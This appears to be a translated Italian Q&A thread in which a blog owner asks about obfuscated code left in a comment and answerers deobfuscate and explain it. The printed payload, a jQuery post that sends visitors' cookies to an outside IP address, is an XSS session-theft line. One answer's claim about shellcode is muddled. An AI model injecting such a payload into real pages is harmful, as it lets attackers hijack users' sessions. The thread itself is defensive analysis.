Ho trovato codice offuscato in un commento sul mio blog. Cosa dovrei fare?

Prima di tutto, il tuo ragazzo della sicurezza probabilmente ha ragione. Non sembra che tu abbia qualcosa di cui preoccuparti perché dalla tua descrizione del problema e dalla risposta del ragazzo penso che i tag dello script siano stati codificati correttamente. Pensala come un'arma neutralizzata. È lì, sì, ma non può fare alcun danno.

L'esecuzione di quel codice tramite un deobfuscator ci dà

$["post"]("114.45.217.33/vlk.php",{cookie:document["cookie"]},function(){},"html")

Ora basta "beatificare" il codice per renderlo più leggibile

$["post"]("114.45.217.33/vlk.php", {
    cookie: document["cookie"]
}, function () {}, "html")

Come puoi vedere, l'attaccante sperava che il tuo sito fosse vulnerabile a XSS per sfruttarlo e rubare i cookie dei tuoi visitatori, inclusi i tuoi. Sta anche supponendo / sperando che tu stia usando jQuery, ed in realtà è un'ipotesi molto ragionevole in questi giorni. Se riescono a rubare i tuoi cookie, otterranno l'identificativo di sessione e potranno accedere come uno dei tuoi utenti o persino il tuo account amministratore.

Non sono sicuro del motivo per cui ha lasciato la funzione di callback lì o il tipo di risposta, però. Rimozione di loro avrebbe reso il carico utile ancora più piccolo.

L'esecuzione di quell'indirizzo IP tramite uno strumento di controllo della lista nera mostra noi che è probabile che l'ospite sia compromesso. Questo sicuramente sembra un attacco casuale da parte di un bot che cerca di inserire quel codice in blog e siti casuali nella speranza che uno di essi sia vulnerabile.

Oltre alla risposta di Adnan:

Questo è un sottoprodotto di quando un utente malintenzionato sfoga la tua applicazione (invia solo tonnellate di payload per vedere se uno funziona). Se l'applicazione gestisce correttamente la codifica e l'escaping dell'input dell'utente, non è necessario preoccuparsi di essere vulnerabili.

Esistono alcune contromisure che è possibile adottare per ridurre questi attacchi, ad esempio utilizzando un firewall di applicazioni Web o un sistema di rilevamento delle intrusioni. Questi dovrebbero bloccare automaticamente le persone che stanno confondendo la tua applicazione. Potresti anche richiedere una forma di controllo della realtà come un captcha o una sfida prima che sia consentito pubblicare (o se vengono rilevati molti post sequenziali). Questo riduce anche questo tipo di inquinamento.

Questo è ciò che posso capire.

È codificato in esadecimale. Il valore reale è in ascii.

\ x indica che è stato utilizzato come shellcode. L'utente malintenzionato ha provato a inviare valori unicode codificati esadecimali come commento racchiuso in una funzione php per interagire con il server e comprometterlo.

Sembra che abbia fallito in quanto è stato rilevato come commento senza rompere nulla sul tuo blog. Ma questo significa anche che potrebbe esserci qualche vulnerabilità in uno qualsiasi dei componenti che stai usando nel tuo blog. La cosa buona è controllare il sito Web NVD o Cvedetails.com e vedere se ci sono nuovi bug nei componenti che stai usando nel tuo blog.

Inoltre c'è un alto potenziale attaccante è uno skiddie e ha appena attaccato il tuo blog vedendo che si tratta dello stesso software (non della versione;)).